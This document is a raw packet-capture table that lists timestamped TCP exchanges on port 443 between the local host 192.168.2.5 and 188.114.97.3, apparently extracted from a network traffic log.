Oct 24, 2024 21:59:04.454560041 CEST	49708	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.461350918 CEST	49708	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.461386919 CEST	49708	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.461467028 CEST	443	49708	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.770021915 CEST	443	49709	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.770095110 CEST	49709	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.772205114 CEST	49709	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.772214890 CEST	443	49709	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.772555113 CEST	443	49709	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.773674965 CEST	49709	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.773796082 CEST	49709	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.773838997 CEST	443	49709	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.809644938 CEST	443	49710	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.809726000 CEST	49710	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.811924934 CEST	49710	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.811938047 CEST	443	49710	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.812264919 CEST	443	49710	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.815660000 CEST	49710	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.816004992 CEST	49710	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.816041946 CEST	443	49710	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.930979013 CEST	443	49708	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.931091070 CEST	443	49708	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.931158066 CEST	49708	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.933216095 CEST	49708	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.933238029 CEST	443	49708	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.933248043 CEST	49708	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.933253050 CEST	443	49708	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:05.225899935 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:05.225955009 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:05.226052999 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:05.226346970 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:05.226361036 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:05.410502911 CEST	443	49709	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:05.410634041 CEST	443	49709	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:05.410700083 CEST	49709	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:05.410778046 CEST	49709	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:05.410810947 CEST	443	49709	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:05.411798954 CEST	443	49710	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:05.411997080 CEST	49710	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:05.583910942 CEST	49712	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:05.583940029 CEST	443	49712	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:05.584012985 CEST	49712	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:05.584319115 CEST	49712	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:05.584331036 CEST	443	49712	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:05.606297016 CEST	49713	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:05.606338978 CEST	443	49713	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:05.606419086 CEST	49713	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:05.606693983 CEST	49713	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:05.606712103 CEST	443	49713	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.023930073 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.024003029 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.025332928 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.025345087 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.025829077 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.026837111 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.026854992 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.026926994 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.197185040 CEST	443	49712	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.197390079 CEST	49712	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.198431969 CEST	49712	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.198440075 CEST	443	49712	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.198780060 CEST	443	49712	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.199950933 CEST	49712	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.200081110 CEST	49712	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.200122118 CEST	443	49712	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.200191975 CEST	49712	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.200200081 CEST	443	49712	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.233486891 CEST	443	49713	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.233680964 CEST	49713	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.234774113 CEST	49713	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.234796047 CEST	443	49713	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.235127926 CEST	443	49713	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.236118078 CEST	49713	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.236232996 CEST	49713	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.236273050 CEST	443	49713	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.236341953 CEST	49713	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.236350060 CEST	443	49713	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.725106955 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.725236893 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.725317001 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.725333929 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.725363016 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.725413084 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.725451946 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.725608110 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.725657940 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.725672960 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.725768089 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.725819111 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.725827932 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.730196953 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.730256081 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.730262995 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.730351925 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.730406046 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.730412960 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.730870008 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.730922937 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.730931044 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.731067896 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.731127977 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.731173038 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.731190920 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.731203079 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.731209993 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.763256073 CEST	443	49712	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.763356924 CEST	443	49712	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.763411045 CEST	49712	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.763467073 CEST	49712	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.763483047 CEST	443	49712	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.801592112 CEST	443	49713	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.801795006 CEST	443	49713	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.801795959 CEST	49713	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.801841021 CEST	49713	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.920782089 CEST	49714	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.920831919 CEST	443	49714	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.920900106 CEST	49714	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.921494007 CEST	49714	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.921509981 CEST	443	49714	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.990238905 CEST	49715	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.990334034 CEST	443	49715	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:06.990410089 CEST	49715	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.990773916 CEST	49715	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:06.990792990 CEST	443	49715	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:07.020711899 CEST	49716	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:07.020761013 CEST	443	49716	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:07.020828009 CEST	49716	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:07.021068096 CEST	49716	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:07.021085978 CEST	443	49716	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:07.532958031 CEST	443	49714	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:07.533046007 CEST	49714	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:07.534379005 CEST	49714	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:07.534384966 CEST	443	49714	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:07.534627914 CEST	443	49714	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:07.535847902 CEST	49714	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:07.535974026 CEST	49714	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:07.536006927 CEST	443	49714	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:07.618161917 CEST	443	49715	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:07.618287086 CEST	49715	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:07.623511076 CEST	49715	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:07.623547077 CEST	443	49715	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:07.623934031 CEST	443	49715	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:07.624942064 CEST	49715	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:07.625072956 CEST	49715	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:07.625108004 CEST	443	49715	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:07.625191927 CEST	49715	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:07.625201941 CEST	443	49715	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:07.641520023 CEST	443	49716	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:07.641726971 CEST	49716	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:07.643049955 CEST	49716	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:07.643057108 CEST	443	49716	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:07.643289089 CEST	443	49716	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:07.644308090 CEST	49716	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:07.644424915 CEST	49716	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:07.644457102 CEST	443	49716	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:07.644520998 CEST	49716	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:07.644530058 CEST	443	49716	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:08.141693115 CEST	443	49714	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:08.141801119 CEST	443	49714	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:08.141902924 CEST	49714	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:08.142430067 CEST	49714	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:08.142445087 CEST	443	49714	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:08.231707096 CEST	49717	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:08.231755018 CEST	443	49717	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:08.231829882 CEST	49717	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:08.232109070 CEST	49717	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:08.232125044 CEST	443	49717	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:08.355545044 CEST	443	49715	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:08.355751038 CEST	49715	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:08.355767012 CEST	443	49715	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:08.355818987 CEST	49715	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:08.358007908 CEST	443	49716	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:08.358203888 CEST	49716	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:08.757880926 CEST	49718	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:08.757909060 CEST	443	49718	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:08.758234024 CEST	49718	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:08.758315086 CEST	49718	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:08.758322954 CEST	443	49718	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:08.844139099 CEST	443	49717	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:08.844208956 CEST	49717	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:08.845726967 CEST	49717	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:08.845736027 CEST	443	49717	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:08.846115112 CEST	443	49717	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:08.847388029 CEST	49717	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:08.847532034 CEST	49717	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:08.847567081 CEST	443	49717	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:08.847605944 CEST	49717	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:08.847610950 CEST	443	49717	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:08.944878101 CEST	49719	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:08.944931030 CEST	443	49719	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:08.945002079 CEST	49719	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:08.945363045 CEST	49719	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:08.945374966 CEST	443	49719	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:09.393234015 CEST	443	49718	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:09.393352985 CEST	49718	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:09.394741058 CEST	49718	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:09.394756079 CEST	443	49718	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:09.395167112 CEST	443	49718	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:09.396848917 CEST	49718	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:09.396958113 CEST	49718	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:09.396966934 CEST	443	49718	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:09.417994976 CEST	443	49717	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:09.418093920 CEST	443	49717	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:09.418308020 CEST	49717	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:09.418346882 CEST	49717	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:09.418365002 CEST	443	49717	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:09.589497089 CEST	443	49719	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:09.589580059 CEST	49719	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:09.591593027 CEST	49719	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:09.591599941 CEST	443	49719	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:09.591852903 CEST	443	49719	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:09.594733000 CEST	49719	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:09.594919920 CEST	49719	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:09.594923973 CEST	443	49719	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:09.770519972 CEST	49720	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:09.770567894 CEST	443	49720	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:09.770653009 CEST	49720	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:09.771090984 CEST	49720	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:09.771105051 CEST	443	49720	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:09.913717985 CEST	443	49718	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:09.914099932 CEST	49718	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:09.935041904 CEST	443	49719	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:09.935129881 CEST	443	49719	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:09.935194016 CEST	49719	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:09.935470104 CEST	49719	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:09.935478926 CEST	443	49719	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:10.121260881 CEST	49721	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:10.121284008 CEST	443	49721	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:10.121352911 CEST	49721	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:10.121803999 CEST	49721	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:10.121818066 CEST	443	49721	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:10.191669941 CEST	49722	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:10.191694975 CEST	443	49722	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:10.191752911 CEST	49722	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:10.192487001 CEST	49722	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:10.192509890 CEST	443	49722	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:10.390111923 CEST	443	49720	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:10.390316010 CEST	49720	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:10.391757011 CEST	49720	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:10.391767025 CEST	443	49720	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:10.391976118 CEST	443	49720	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:10.393639088 CEST	49720	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:10.393829107 CEST	49720	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:10.393877029 CEST	443	49720	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:10.393989086 CEST	49720	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:10.394007921 CEST	443	49720	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:11.764132023 CEST	443	49720	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:11.764202118 CEST	443	49720	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:11.764290094 CEST	49720	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:11.764483929 CEST	49720	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:11.764501095 CEST	443	49720	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:11.767452955 CEST	443	49722	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:11.767528057 CEST	49722	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:11.769217968 CEST	49722	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:11.769227982 CEST	443	49722	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:11.769556999 CEST	443	49722	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:11.771159887 CEST	49722	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:11.771285057 CEST	49722	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:11.771291971 CEST	443	49722	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:11.771363974 CEST	443	49721	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:11.771444082 CEST	49721	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:11.772980928 CEST	49721	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:11.772988081 CEST	443	49721	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:11.773394108 CEST	443	49721	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:11.796142101 CEST	49721	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:11.796396017 CEST	49721	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:11.796401024 CEST	443	49721	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:12.109889030 CEST	49723	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:12.109919071 CEST	443	49723	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:12.109994888 CEST	49723	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:12.110301971 CEST	49723	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:12.110317945 CEST	443	49723	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:12.747209072 CEST	443	49723	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:12.747303009 CEST	49723	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:12.749030113 CEST	49723	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:12.749043941 CEST	443	49723	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:12.749366999 CEST	443	49723	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:12.750647068 CEST	49723	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:12.750933886 CEST	49723	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:12.750941038 CEST	443	49723	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:12.963756084 CEST	443	49722	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:12.963988066 CEST	443	49722	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:12.964165926 CEST	49722	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:12.964167118 CEST	49722	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:13.043188095 CEST	49724	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:13.043235064 CEST	443	49724	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:13.043320894 CEST	49724	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:13.043603897 CEST	49724	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:13.043620110 CEST	443	49724	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:13.267138958 CEST	49722	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:13.267163038 CEST	443	49722	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:13.270924091 CEST	443	49723	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:13.271054029 CEST	443	49723	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:13.271136045 CEST	49723	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:13.271267891 CEST	49723	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:13.271289110 CEST	443	49723	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:13.362315893 CEST	49725	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:13.362344980 CEST	443	49725	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:13.362409115 CEST	49725	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:13.362668037 CEST	49725	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:13.362684965 CEST	443	49725	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:13.386615038 CEST	443	49721	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:13.386852026 CEST	49721	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:13.386857033 CEST	443	49721	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:13.386912107 CEST	49721	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:13.411763906 CEST	49726	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:13.411792040 CEST	443	49726	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:13.411873102 CEST	49726	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:13.412106037 CEST	49726	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:13.412122011 CEST	443	49726	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:13.651675940 CEST	443	49724	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:13.651791096 CEST	49724	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:13.653597116 CEST	49724	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:13.653609991 CEST	443	49724	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:13.653845072 CEST	443	49724	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:13.655603886 CEST	49724	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:13.655642033 CEST	49724	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:13.655705929 CEST	443	49724	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:13.977387905 CEST	443	49725	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:13.977478981 CEST	49725	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:14.041698933 CEST	443	49726	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:14.041778088 CEST	49726	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:14.080310106 CEST	49725	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:14.080327034 CEST	443	49725	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:14.080590010 CEST	443	49725	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:14.094094992 CEST	49725	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:14.094094992 CEST	49725	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:14.094114065 CEST	443	49725	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:14.177339077 CEST	443	49724	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:14.177597046 CEST	443	49724	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:14.177668095 CEST	49724	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:14.196763039 CEST	49726	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:14.196787119 CEST	443	49726	188.114.97.3	192.168.2.5
